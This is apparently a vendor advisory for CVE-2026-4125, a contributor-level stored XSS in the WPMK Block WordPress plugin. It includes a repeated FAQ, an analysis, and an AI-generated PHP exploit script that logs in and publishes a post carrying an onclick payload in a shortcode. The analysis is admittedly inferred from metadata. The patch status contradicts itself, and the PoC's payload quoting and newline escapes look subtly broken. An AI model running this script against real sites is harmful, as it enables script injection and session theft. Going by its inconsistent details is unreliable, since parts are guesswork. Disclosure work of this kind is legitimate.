What is CVE-2026-4125?

CVE-2026-4125 is a stored cross-site scripting (XSS) vulnerability in the WPMK Block plugin for WordPress, affecting versions up to 1.0.1. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘class’ shortcode attribute.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the wpmk_block_shortcode() function. Attackers can manipulate the ‘class’ attribute in a shortcode, allowing them to inject arbitrary JavaScript that executes when the page is viewed.

Who is affected by this vulnerability?

Any WordPress site using the WPMK Block plugin version 1.0.1 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

Check the version of the WPMK Block plugin installed on your WordPress site. If it is version 1.0.1 or earlier, your site is vulnerable to CVE-2026-4125. Additionally, review any shortcodes using the ‘class’ attribute for potential exploitation.

What is the severity level of this vulnerability?

CVE-2026-4125 has a CVSS score of 6.4, indicating a medium severity level. This means while it is not the highest risk, it still poses a significant threat that could lead to unauthorized actions and data exposure.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the WPMK Block plugin to the latest version that addresses the issue. Additionally, ensure that input sanitization and output escaping practices are followed in shortcode implementations.

What does the proof of concept demonstrate?

The proof of concept shows how an authenticated user can log in and inject a malicious payload into the ‘class’ attribute of a shortcode. When the page is rendered, the injected script executes, demonstrating the vulnerability’s impact.

What coding practices should be followed to prevent such vulnerabilities?

Developers should use WordPress functions like esc_attr() to escape output and sanitize_html_class() for validating CSS class inputs. Following these practices helps prevent XSS vulnerabilities in shortcode attributes.

Is there a patch available for this vulnerability?

Yes, the WPMK Block plugin has released an update that addresses CVE-2026-4125. It is recommended to update to the latest version to ensure your site is protected from this vulnerability.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the WPMK Block plugin or restricting access to the WordPress editor for users with Contributor-level access until you can apply the update.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 24, 2026

CVE-2026-4125: WPMK Block <= 1.0.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (wpmk-block)

Q: What are the potential risks of exploitation?

If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in the browsers of users viewing the compromised page. This can lead to session hijacking, phishing attacks, and unauthorized actions on behalf of users.

CVE ID CVE-2026-4125

Plugin wpmk-block

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0.1

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4125 (metadata-based): This vulnerability allows authenticated attackers with Contributor-level access or higher to inject stored cross-site scripting (XSS) via the ‘class’ shortcode attribute in the WPMK Block plugin versions up to and including 1.0.1. The CVSS score is 6.4 (Medium), with a vector of AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N.

The root cause, inferred from the CWE-79 classification and vulnerability description, is insufficient input sanitization and output escaping in the wpmk_block_shortcode() function. The ‘class’ attribute is extracted from user-supplied shortcode attributes and directly concatenated into an HTML div element’s class attribute without using esc_attr() or similar escaping functions. This is a classic stored XSS pattern where attacker-controlled input flows into HTML attribute context without sanitization. No code diff is available, so this is inferred from the description and common WordPress code patterns.

Exploitation: An attacker with Contributor-level access creates or edits a WordPress post/page containing the WPMK Block shortcode. The attacker injects a malicious payload into the ‘class’ attribute, such as xss” onclick=”alert(1). The shortcode syntax would be [wpmk_block class=’xss” onclick=”alert(1)’]. When the post is rendered, the injected JavaScript executes in the context of any user viewing the page. The attack vector is via the WordPress post editor, specifically through the shortcode interface, requiring no additional endpoints beyond standard post creation.

Remediation: The plugin should use WordPress escaping functions on the ‘class’ attribute before concatenation. The fix would apply esc_attr() to the attribute value to neutralize any HTML special characters or quotes. Additionally, the plugin should validate or sanitize the input attribute using sanitize_html_class() if the attribute is intended to be a single CSS class. This follows standard WordPress coding practices for shortcode attribute handling.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users viewing the compromised page. This can lead to session hijacking, phishing attacks, defacement, or unauthorized actions performed on behalf of authenticated users. Because the script executes in the context of the affected site, it can access cookies, local storage, and perform actions as the logged-in user. The scope changed (S) in the CVSS indicates the payload affects resources beyond the vulnerable component, such as other users’ sessions.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4125 - WPMK Block <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

$target_url = 'http://example.com'; // Change to target WordPress site URL
$username = 'contributor'; // WordPress user with Contributor role
$password = 'password'; // Password for the user

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Create a new post with the malicious shortcode
$post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// Extract _wpnonce from the response (simplified; full implementation would parse HTML)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Submit the post with injected XSS payload in the shortcode
$create_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    '_wpnonce' => $nonce,
    'post_title' => 'CVE-2026-4125 Test',
    'content' => '[wpmk_block class="xss" onclick="alert(1);"]Your content here[/wpmk_block]',
    'post_status' => 'publish',
    'post_type' => 'post',
    'action' => 'editpost',
    'originalaction' => 'editpost'
);

curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

// Check if post was created (simplified)
if (strpos($response, 'Post published.') !== false) {
    echo "[+] PoC post created successfully. Visit the post to trigger XSS.n";
} else {
    echo "[-] Failed to create post. Check credentials or nonce handling.n";
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-4125?
Understanding the vulnerability
CVE-2026-4125 is a stored cross-site scripting (XSS) vulnerability in the WPMK Block plugin for WordPress, affecting versions up to 1.0.1. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘class’ shortcode attribute.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the wpmk_block_shortcode() function. Attackers can manipulate the ‘class’ attribute in a shortcode, allowing them to inject arbitrary JavaScript that executes when the page is viewed.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the WPMK Block plugin version 1.0.1 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability
Check the version of the WPMK Block plugin installed on your WordPress site. If it is version 1.0.1 or earlier, your site is vulnerable to CVE-2026-4125. Additionally, review any shortcodes using the ‘class’ attribute for potential exploitation.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-4125 has a CVSS score of 6.4, indicating a medium severity level. This means while it is not the highest risk, it still poses a significant threat that could lead to unauthorized actions and data exposure.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the WPMK Block plugin to the latest version that addresses the issue. Additionally, ensure that input sanitization and output escaping practices are followed in shortcode implementations.
What are the potential risks of exploitation?
Consequences of successful attacks
If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in the browsers of users viewing the compromised page. This can lead to session hijacking, phishing attacks, and unauthorized actions on behalf of users.
What does the proof of concept demonstrate?
Illustrating the vulnerability
The proof of concept shows how an authenticated user can log in and inject a malicious payload into the ‘class’ attribute of a shortcode. When the page is rendered, the injected script executes, demonstrating the vulnerability’s impact.
What coding practices should be followed to prevent such vulnerabilities?
Best practices for developers
Developers should use WordPress functions like esc_attr() to escape output and sanitize_html_class() for validating CSS class inputs. Following these practices helps prevent XSS vulnerabilities in shortcode attributes.
Is there a patch available for this vulnerability?
Updates and fixes
Yes, the WPMK Block plugin has released an update that addresses CVE-2026-4125. It is recommended to update to the latest version to ensure your site is protected from this vulnerability.
What should I do if I cannot update the plugin immediately?
Temporary measures
If you cannot update the plugin immediately, consider disabling the WPMK Block plugin or restricting access to the WordPress editor for users with Contributor-level access until you can apply the update.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations